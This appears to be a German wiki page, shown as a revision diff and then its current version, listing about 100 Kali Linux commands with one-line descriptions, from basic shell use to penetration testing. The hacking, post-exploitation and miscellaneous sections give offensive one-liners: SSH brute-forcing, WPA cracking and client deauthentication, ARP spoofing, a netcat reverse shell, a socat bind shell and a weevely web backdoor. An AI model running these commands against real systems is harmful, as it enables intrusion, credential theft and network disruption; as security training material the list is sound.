100 Kali Kommandos: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „= 01. Basic Linux Commands = Zeigt das aktuelle Arbeitsverzeichnis. *pwd Listet Dateien und Verzeichnisse auf. *ls Wechselt das Verzeichnis. *cd Erstellt e…“) |
|||
| (Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| − | = | + | = Basic Linux Commands = |
| − | Zeigt das aktuelle Arbeitsverzeichnis. | + | ;Zeigt das aktuelle Arbeitsverzeichnis. |
*pwd | *pwd | ||
| − | Listet Dateien und Verzeichnisse auf. | + | ;Listet Dateien und Verzeichnisse auf. |
*ls | *ls | ||
| − | Wechselt das Verzeichnis. | + | ;Wechselt das Verzeichnis. |
*cd | *cd | ||
| − | Erstellt ein neues Verzeichnis. | + | ;Erstellt ein neues Verzeichnis. |
*mkdir <dir> | *mkdir <dir> | ||
| − | Löscht eine Datei. | + | ;Löscht eine Datei. |
*rm <file> | *rm <file> | ||
| − | Löscht ein Verzeichnis rekursiv. | + | ;Löscht ein Verzeichnis rekursiv. |
*rm -r <dir> | *rm -r <dir> | ||
| − | Kopiert Dateien. | + | ;Kopiert Dateien. |
*cp <src> <dest> | *cp <src> <dest> | ||
| − | Verschiebt oder benennt Dateien um. | + | ;Verschiebt oder benennt Dateien um. |
*mv <src> <dest> | *mv <src> <dest> | ||
| − | Erstellt eine leere Datei. | + | ;Erstellt eine leere Datei. |
*touch <file> | *touch <file> | ||
| − | Gibt den Inhalt einer Datei aus. | + | ;Gibt den Inhalt einer Datei aus. |
*cat <file> | *cat <file> | ||
| − | Öffnet eine Datei im Editor Nano. | + | ;Öffnet eine Datei im Editor Nano. |
*nano <file> | *nano <file> | ||
| − | Öffnet eine Datei im Editor Vim. | + | ;Öffnet eine Datei im Editor Vim. |
*vim <file> | *vim <file> | ||
| − | Sucht eine Datei anhand des Namens. | + | ;Sucht eine Datei anhand des Namens. |
*find / -name <filename> | *find / -name <filename> | ||
| − | Durchsucht eine Datei nach Textmustern. | + | ;Durchsucht eine Datei nach Textmustern. |
*grep "text" <file> | *grep "text" <file> | ||
| − | Zeigt die | + | ;Zeigt die eingegebenen Befehle der Shell-Historie. |
*history | *history | ||
| − | |||
| − | Zeigt Systeminformationen. | + | = System Information Commands = |
| + | |||
| + | ;Zeigt Systeminformationen. | ||
*uname -a | *uname -a | ||
| − | Zeigt den aktuellen Benutzer. | + | ;Zeigt den aktuellen Benutzer. |
*whoami | *whoami | ||
| − | Zeigt UID und GID des Benutzers. | + | ;Zeigt UID und GID des Benutzers. |
*id | *id | ||
| − | Zeigt die Systemlaufzeit. | + | ;Zeigt die Systemlaufzeit. |
*uptime | *uptime | ||
| − | Zeigt den belegten Festplattenplatz. | + | ;Zeigt den belegten Festplattenplatz. |
*df -h | *df -h | ||
| − | Zeigt die Größe eines Verzeichnisses. | + | ;Zeigt die Größe eines Verzeichnisses. |
*du -sh <dir> | *du -sh <dir> | ||
| − | Zeigt aktive Prozesse. | + | ;Zeigt aktive Prozesse. |
*top | *top | ||
| − | Listet alle Prozesse auf. | + | ;Listet alle Prozesse auf. |
*ps aux | *ps aux | ||
| − | Beendet einen Prozess über die PID. | + | ;Beendet einen Prozess über die PID. |
*kill <PID> | *kill <PID> | ||
| − | Interaktiver Prozessmanager. | + | ;Interaktiver Prozessmanager. |
*htop | *htop | ||
| − | |||
| − | Erstellt einen neuen Benutzer. | + | = User Management Commands = |
| + | |||
| + | ;Erstellt einen neuen Benutzer. | ||
*adduser <username> | *adduser <username> | ||
| − | Löscht einen Benutzer. | + | ;Löscht einen Benutzer. |
*deluser <username> | *deluser <username> | ||
| − | Ändert das Passwort eines Benutzers. | + | ;Ändert das Passwort eines Benutzers. |
*passwd <username> | *passwd <username> | ||
| − | Fügt einen Benutzer zur sudo-Gruppe hinzu. | + | ;Fügt einen Benutzer zur sudo-Gruppe hinzu. |
*usermod -aG sudo <username> | *usermod -aG sudo <username> | ||
| − | Zeigt Gruppenmitgliedschaften eines Benutzers. | + | ;Zeigt Gruppenmitgliedschaften eines Benutzers. |
*groups <username> | *groups <username> | ||
| − | Ändert Dateiberechtigungen. | + | ;Ändert Dateiberechtigungen. |
*chmod 777 <file> | *chmod 777 <file> | ||
| − | Ändert Dateibesitzer und Gruppe. | + | ;Ändert Dateibesitzer und Gruppe. |
*chown user:group <file> | *chown user:group <file> | ||
| − | |||
| − | Zeigt Netzwerkinterfaces an. | + | = Networking Commands = |
| + | |||
| + | ;Zeigt Netzwerkinterfaces an. | ||
*ifconfig | *ifconfig | ||
| − | Zeigt IP-Adressen und Interfaces. | + | ;Zeigt IP-Adressen und Interfaces. |
*ip a | *ip a | ||
| − | Zeigt Wireless-Interfaces an. | + | ;Zeigt Wireless-Interfaces an. |
*iwconfig | *iwconfig | ||
| − | Testet Netzwerkverbindung via ICMP. | + | ;Testet Netzwerkverbindung via ICMP. |
*ping <IP> | *ping <IP> | ||
| − | Zeigt offene Ports mit | + | ;Zeigt offene Ports mit Prozessen. |
*netstat -tulnp | *netstat -tulnp | ||
| − | Scant ein Zielsystem auf offene Ports. | + | ;Scant ein Zielsystem auf offene Ports. |
*nmap <IP> | *nmap <IP> | ||
| − | Zeigt den Routingpfad zu einem Host. | + | ;Zeigt den Routingpfad zu einem Host. |
*traceroute <IP> | *traceroute <IP> | ||
| − | Lädt Daten von einer URL herunter. | + | ;Lädt Daten von einer URL herunter. |
*curl <URL> | *curl <URL> | ||
| − | Lädt eine Datei von einer URL. | + | ;Lädt eine Datei von einer URL herunter. |
*wget <URL> | *wget <URL> | ||
| − | Zeigt DNS-Informationen zu einer Domain. | + | ;Zeigt DNS-Informationen zu einer Domain. |
*dig <domain> | *dig <domain> | ||
| − | Führt einfache DNS-Abfragen durch. | + | ;Führt einfache DNS-Abfragen durch. |
*nslookup <domain> | *nslookup <domain> | ||
| − | |||
| − | Startet die Metasploit-Konsole. | + | = Hacking & Penetration Testing = |
| + | |||
| + | ;Startet die Metasploit-Konsole. | ||
*msfconsole | *msfconsole | ||
| − | Erstellt Payloads. | + | ;Erstellt Payloads. |
*msfvenom | *msfvenom | ||
| − | Durchsucht Exploit-Datenbanken. | + | ;Durchsucht Exploit-Datenbanken. |
*searchsploit <exploit> | *searchsploit <exploit> | ||
| − | Testet SQL-Injection gegen eine URL. | + | ;Testet SQL-Injection gegen eine URL. |
*sqlmap -u <URL> --dbs | *sqlmap -u <URL> --dbs | ||
| − | + | ;Bruteforced SSH-Zugänge. | |
*hydra -l user -P pass.txt <IP> ssh | *hydra -l user -P pass.txt <IP> ssh | ||
| − | Crackt Hashes mit John the Ripper. | + | ;Crackt Hashes mit John the Ripper. |
*john --wordlist=rockyou.txt hash.txt | *john --wordlist=rockyou.txt hash.txt | ||
| − | Aktiviert | + | ;Aktiviert Monitor-Modus für WLAN. |
*airmon-ng start wlan0 | *airmon-ng start wlan0 | ||
| − | Fängt WLAN-Pakete ab. | + | ;Fängt WLAN-Pakete ab. |
*airodump-ng wlan0mon | *airodump-ng wlan0mon | ||
| − | Deauthentifiziert Clients | + | ;Deauthentifiziert Clients. |
*aireplay-ng -0 10 -a <BSSID> wlan0mon | *aireplay-ng -0 10 -a <BSSID> wlan0mon | ||
| − | Crackt WPA/WPA2-Passwörter. | + | ;Crackt WPA/WPA2-Passwörter. |
| − | *aircrack-ng -w rockyou.txt -b <BSSID> < | + | *aircrack-ng -w rockyou.txt -b <BSSID> <capture> |
| − | Crackt Hashes mit GPU. | + | ;Crackt Hashes mit GPU. |
*hashcat -m 2500 hash.txt rockyou.txt | *hashcat -m 2500 hash.txt rockyou.txt | ||
| − | Führt ARP-Spoofing durch. | + | ;Führt ARP-Spoofing durch. |
*ettercap -T -q -i eth0 | *ettercap -T -q -i eth0 | ||
| − | Extrahiert Bilder aus Netzwerktraffic. | + | ;Extrahiert Bilder aus Netzwerktraffic. |
*driftnet -i eth0 | *driftnet -i eth0 | ||
| − | Zeichnet Netzwerkpakete auf. | + | ;Zeichnet Netzwerkpakete auf. |
*tcpdump -i eth0 | *tcpdump -i eth0 | ||
| − | Analysiert Netzwerkverkehr. | + | ;Analysiert Netzwerkverkehr. |
*tshark -i eth0 | *tshark -i eth0 | ||
| − | Scant Webserver auf Schwachstellen. | + | ;Scant Webserver auf Schwachstellen. |
*nikto -h <URL> | *nikto -h <URL> | ||
| − | Führt Directory-Bruteforce durch. | + | ;Führt Directory-Bruteforce durch. |
*gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt | *gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt | ||
| − | Scant WordPress | + | ;Scant WordPress auf Schwachstellen. |
*wpscan --url <URL> | *wpscan --url <URL> | ||
| − | |||
| − | Zeigt sudo-Berechtigungen. | + | = Privilege Escalation & Post-Exploitation = |
| + | |||
| + | ;Zeigt sudo-Berechtigungen. | ||
*sudo -l | *sudo -l | ||
| − | Wechselt zum root-Benutzer. | + | ;Wechselt zum root-Benutzer. |
*sudo su | *sudo su | ||
| − | Erstellt eine interaktive Shell in Python. | + | ;Erstellt eine interaktive Shell in Python. |
*python -c 'import pty; pty.spawn("/bin/bash")' | *python -c 'import pty; pty.spawn("/bin/bash")' | ||
| − | Startet einen Netcat-Listener. | + | ;Startet einen Netcat-Listener. |
*nc -lvnp <port> | *nc -lvnp <port> | ||
| − | + | ;Erzeugt eine Reverse-Shell. | |
*nc <IP> <port> -e /bin/bash | *nc <IP> <port> -e /bin/bash | ||
| − | Zeigt den aktuellen Benutzer | + | ;Zeigt den aktuellen Benutzer in Meterpreter. |
*meterpreter> getuid | *meterpreter> getuid | ||
| − | Versucht Privilege Escalation | + | ;Versucht Privilege Escalation in Meterpreter. |
*meterpreter> getsystem | *meterpreter> getsystem | ||
| − | Überträgt Dateien via Meterpreter. | + | ;Überträgt Dateien via Meterpreter. |
*meterpreter> upload / download <file> | *meterpreter> upload / download <file> | ||
| − | Öffnet eine System-Shell im Meterpreter. | + | ;Öffnet eine System-Shell im Meterpreter. |
*meterpreter> shell | *meterpreter> shell | ||
| − | Schlägt mögliche | + | ;Schlägt mögliche PrivEsc-Exploits vor. |
*linux-exploit-suggester | *linux-exploit-suggester | ||
| − | |||
| − | Verschlüsselt eine Datei | + | = File & Data Encryption = |
| + | |||
| + | ;Verschlüsselt eine Datei. | ||
*gpg -c <file> | *gpg -c <file> | ||
| − | Entschlüsselt eine GPG-Datei. | + | ;Entschlüsselt eine GPG-Datei. |
*gpg -d <file.gpg> | *gpg -d <file.gpg> | ||
| − | Verschlüsselt Dateien mit OpenSSL. | + | ;Verschlüsselt Dateien mit OpenSSL. |
*openssl enc -aes-256-cbc -salt -in <file> -out <file.enc> | *openssl enc -aes-256-cbc -salt -in <file> -out <file.enc> | ||
| − | Entschlüsselt | + | ;Entschlüsselt OpenSSL AES-Dateien. |
*openssl enc -d -aes-256-cbc -in <file.enc> -out <file> | *openssl enc -d -aes-256-cbc -in <file.enc> -out <file> | ||
| − | |||
| − | Extrahiert druckbare | + | = Forensics & Steganography = |
| + | |||
| + | ;Extrahiert druckbare Zeichenketten. | ||
*strings <file> | *strings <file> | ||
| − | Analysiert Binärdateien. | + | ;Analysiert Binärdateien auf Strukturen. |
*binwalk <file> | *binwalk <file> | ||
| − | Extrahiert Dateien aus Images. | + | ;Extrahiert Dateien aus Images. |
*foremost -i <image> | *foremost -i <image> | ||
| − | Zeigt Metadaten einer Datei. | + | ;Zeigt Metadaten einer Datei. |
*exiftool <file> | *exiftool <file> | ||
| − | Findet versteckte Daten in Bildern. | + | ;Findet versteckte Daten in Bildern. |
*stegseek <stegfile> | *stegseek <stegfile> | ||
| − | |||
| − | Erkennt Hash-Typen. | + | = Password & Hash Cracking = |
| + | |||
| + | ;Erkennt Hash-Typen. | ||
*hashid <hash> | *hashid <hash> | ||
| − | + | ;Führt SSH-Bruteforce durch. | |
*hydra -L users.txt -P passwords.txt ssh://<IP> | *hydra -L users.txt -P passwords.txt ssh://<IP> | ||
| − | Crackt Passwort-Hashes. | + | ;Crackt Passwort-Hashes. |
*john hash.txt --wordlist=rockyou.txt | *john hash.txt --wordlist=rockyou.txt | ||
| − | |||
| − | Führt Directory Enumeration durch. | + | = Web Application Testing = |
| + | |||
| + | ;Führt Directory Enumeration durch. | ||
*dirb <URL> | *dirb <URL> | ||
| − | Führt Web-Fuzzing durch. | + | ;Führt Web-Fuzzing durch. |
*wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ | *wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ | ||
| − | Testet Webanwendungen auf XSS. | + | ;Testet Webanwendungen auf XSS. |
*xsssniper -u <URL> | *xsssniper -u <URL> | ||
| − | Testet Webanwendungen auf Command Injection. | + | ;Testet Webanwendungen auf Command Injection. |
*commix --url <URL> | *commix --url <URL> | ||
| − | Startet Burp Suite. | + | ;Startet Burp Suite. |
*burpsuite | *burpsuite | ||
| + | |||
= Miscellaneous = | = Miscellaneous = | ||
| − | Erstellt Wordlists | + | ;Erstellt Wordlists. |
*crunch 8 8 abcdefghijklmnopqrstuvwxyz | *crunch 8 8 abcdefghijklmnopqrstuvwxyz | ||
| − | Führt nmap über Proxychains aus. | + | ;Führt nmap über Proxychains aus. |
*proxychains nmap -sT -Pn <IP> | *proxychains nmap -sT -Pn <IP> | ||
| − | Startet Tor. | + | ;Startet den Tor-Dienst. |
*tor | *tor | ||
| − | Startet einen MITM-Proxy. | + | ;Startet einen MITM-Proxy. |
*mitmproxy | *mitmproxy | ||
| − | Startet das Social Engineering Toolkit. | + | ;Startet das Social Engineering Toolkit. |
*setoolkit | *setoolkit | ||
| − | Erstellt | + | ;Erstellt Wordlists aus Webseiten. |
*cewl -w words.txt -d 5 <URL> | *cewl -w words.txt -d 5 <URL> | ||
| − | Erstellt einen Web-Backdoor mit weevely. | + | ;Erstellt einen Web-Backdoor mit weevely. |
*weevely generate password backdoor.php | *weevely generate password backdoor.php | ||
| − | Startet | + | ;Startet eine bind shell via socat. |
*socat TCP-LISTEN:4444,fork EXEC:/bin/bash | *socat TCP-LISTEN:4444,fork EXEC:/bin/bash | ||
| − | Zeigt Domaininformationen | + | ;Zeigt Domaininformationen. |
*whois <domain> | *whois <domain> | ||
| − | Sammelt Mails und Subdomains | + | ;Sammelt Mails und Subdomains. |
*theHarvester -d <domain> -l 100 -b google | *theHarvester -d <domain> -l 100 -b google | ||
| − | Crackt ZIP-Passwörter. | + | ;Crackt ZIP-Passwörter. |
*fcrackzip -u -D -p rockyou.txt <file.zip> | *fcrackzip -u -D -p rockyou.txt <file.zip> | ||
| − | Sucht Subdomains. | + | ;Sucht Subdomains einer Domain. |
*dnsmap -d <domain> | *dnsmap -d <domain> | ||
Aktuelle Version vom 16. November 2025, 08:56 Uhr
Basic Linux Commands
- Zeigt das aktuelle Arbeitsverzeichnis.
- pwd
- Listet Dateien und Verzeichnisse auf.
- ls
- Wechselt das Verzeichnis.
- cd
- Erstellt ein neues Verzeichnis.
- mkdir <dir>
- Löscht eine Datei.
- rm <file>
- Löscht ein Verzeichnis rekursiv.
- rm -r <dir>
- Kopiert Dateien.
- cp <src> <dest>
- Verschiebt oder benennt Dateien um.
- mv <src> <dest>
- Erstellt eine leere Datei.
- touch <file>
- Gibt den Inhalt einer Datei aus.
- cat <file>
- Öffnet eine Datei im Editor Nano.
- nano <file>
- Öffnet eine Datei im Editor Vim.
- vim <file>
- Sucht eine Datei anhand des Namens.
- find / -name <filename>
- Durchsucht eine Datei nach Textmustern.
- grep "text" <file>
- Zeigt die eingegebenen Befehle der Shell-Historie.
- history
System Information Commands
- Zeigt Systeminformationen.
- uname -a
- Zeigt den aktuellen Benutzer.
- whoami
- Zeigt UID und GID des Benutzers.
- id
- Zeigt die Systemlaufzeit.
- uptime
- Zeigt den belegten Festplattenplatz.
- df -h
- Zeigt die Größe eines Verzeichnisses.
- du -sh <dir>
- Zeigt aktive Prozesse.
- top
- Listet alle Prozesse auf.
- ps aux
- Beendet einen Prozess über die PID.
- kill <PID>
- Interaktiver Prozessmanager.
- htop
User Management Commands
- Erstellt einen neuen Benutzer.
- adduser <username>
- Löscht einen Benutzer.
- deluser <username>
- Ändert das Passwort eines Benutzers.
- passwd <username>
- Fügt einen Benutzer zur sudo-Gruppe hinzu.
- usermod -aG sudo <username>
- Zeigt Gruppenmitgliedschaften eines Benutzers.
- groups <username>
- Ändert Dateiberechtigungen.
- chmod 777 <file>
- Ändert Dateibesitzer und Gruppe.
- chown user:group <file>
Networking Commands
- Zeigt Netzwerkinterfaces an.
- ifconfig
- Zeigt IP-Adressen und Interfaces.
- ip a
- Zeigt Wireless-Interfaces an.
- iwconfig
- Testet Netzwerkverbindung via ICMP.
- ping <IP>
- Zeigt offene Ports mit Prozessen.
- netstat -tulnp
- Scant ein Zielsystem auf offene Ports.
- nmap <IP>
- Zeigt den Routingpfad zu einem Host.
- traceroute <IP>
- Lädt Daten von einer URL herunter.
- curl <URL>
- Lädt eine Datei von einer URL herunter.
- wget <URL>
- Zeigt DNS-Informationen zu einer Domain.
- dig <domain>
- Führt einfache DNS-Abfragen durch.
- nslookup <domain>
Hacking & Penetration Testing
- Startet die Metasploit-Konsole.
- msfconsole
- Erstellt Payloads.
- msfvenom
- Durchsucht Exploit-Datenbanken.
- searchsploit <exploit>
- Testet SQL-Injection gegen eine URL.
- sqlmap -u <URL> --dbs
- Bruteforced SSH-Zugänge.
- hydra -l user -P pass.txt <IP> ssh
- Crackt Hashes mit John the Ripper.
- john --wordlist=rockyou.txt hash.txt
- Aktiviert Monitor-Modus für WLAN.
- airmon-ng start wlan0
- Fängt WLAN-Pakete ab.
- airodump-ng wlan0mon
- Deauthentifiziert Clients.
- aireplay-ng -0 10 -a <BSSID> wlan0mon
- Crackt WPA/WPA2-Passwörter.
- aircrack-ng -w rockyou.txt -b <BSSID> <capture>
- Crackt Hashes mit GPU.
- hashcat -m 2500 hash.txt rockyou.txt
- Führt ARP-Spoofing durch.
- ettercap -T -q -i eth0
- Extrahiert Bilder aus Netzwerktraffic.
- driftnet -i eth0
- Zeichnet Netzwerkpakete auf.
- tcpdump -i eth0
- Analysiert Netzwerkverkehr.
- tshark -i eth0
- Scant Webserver auf Schwachstellen.
- nikto -h <URL>
- Führt Directory-Bruteforce durch.
- gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
- Scant WordPress auf Schwachstellen.
- wpscan --url <URL>
Privilege Escalation & Post-Exploitation
- Zeigt sudo-Berechtigungen.
- sudo -l
- Wechselt zum root-Benutzer.
- sudo su
- Erstellt eine interaktive Shell in Python.
- python -c 'import pty; pty.spawn("/bin/bash")'
- Startet einen Netcat-Listener.
- nc -lvnp <port>
- Erzeugt eine Reverse-Shell.
- nc <IP> <port> -e /bin/bash
- Zeigt den aktuellen Benutzer in Meterpreter.
- meterpreter> getuid
- Versucht Privilege Escalation in Meterpreter.
- meterpreter> getsystem
- Überträgt Dateien via Meterpreter.
- meterpreter> upload / download <file>
- Öffnet eine System-Shell im Meterpreter.
- meterpreter> shell
- Schlägt mögliche PrivEsc-Exploits vor.
- linux-exploit-suggester
File & Data Encryption
- Verschlüsselt eine Datei.
- gpg -c <file>
- Entschlüsselt eine GPG-Datei.
- gpg -d <file.gpg>
- Verschlüsselt Dateien mit OpenSSL.
- openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
- Entschlüsselt OpenSSL AES-Dateien.
- openssl enc -d -aes-256-cbc -in <file.enc> -out <file>
Forensics & Steganography
- Extrahiert druckbare Zeichenketten.
- strings <file>
- Analysiert Binärdateien auf Strukturen.
- binwalk <file>
- Extrahiert Dateien aus Images.
- foremost -i <image>
- Zeigt Metadaten einer Datei.
- exiftool <file>
- Findet versteckte Daten in Bildern.
- stegseek <stegfile>
Password & Hash Cracking
- Erkennt Hash-Typen.
- hashid <hash>
- Führt SSH-Bruteforce durch.
- hydra -L users.txt -P passwords.txt ssh://<IP>
- Crackt Passwort-Hashes.
- john hash.txt --wordlist=rockyou.txt
Web Application Testing
- Führt Directory Enumeration durch.
- dirb <URL>
- Führt Web-Fuzzing durch.
- wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
- Testet Webanwendungen auf XSS.
- xsssniper -u <URL>
- Testet Webanwendungen auf Command Injection.
- commix --url <URL>
- Startet Burp Suite.
- burpsuite
Miscellaneous
- Erstellt Wordlists.
- crunch 8 8 abcdefghijklmnopqrstuvwxyz
- Führt nmap über Proxychains aus.
- proxychains nmap -sT -Pn <IP>
- Startet den Tor-Dienst.
- tor
- Startet einen MITM-Proxy.
- mitmproxy
- Startet das Social Engineering Toolkit.
- setoolkit
- Erstellt Wordlists aus Webseiten.
- cewl -w words.txt -d 5 <URL>
- Erstellt einen Web-Backdoor mit weevely.
- weevely generate password backdoor.php
- Startet eine bind shell via socat.
- socat TCP-LISTEN:4444,fork EXEC:/bin/bash
- Zeigt Domaininformationen.
- whois <domain>
- Sammelt Mails und Subdomains.
- theHarvester -d <domain> -l 100 -b google
- Crackt ZIP-Passwörter.
- fcrackzip -u -D -p rockyou.txt <file.zip>
- Sucht Subdomains einer Domain.
- dnsmap -d <domain>